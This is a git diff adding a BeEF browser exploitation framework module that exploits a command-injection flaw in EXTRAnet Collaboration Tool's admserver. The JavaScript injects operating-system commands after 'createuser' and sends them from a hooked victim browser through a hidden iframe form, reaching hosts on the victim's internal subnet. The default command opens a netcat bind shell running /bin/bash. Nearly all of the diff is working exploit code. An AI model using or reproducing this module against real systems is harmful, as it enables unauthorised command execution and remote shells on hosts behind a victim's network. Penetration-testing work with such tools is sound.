diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(extract_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ extract_cmd_exec:
+ enable: true
+ category: "Exploits"
+ name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+ description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.
The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.
The results of the commands are not returned to BeEF.
Note: Spaces in the command are not supported."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end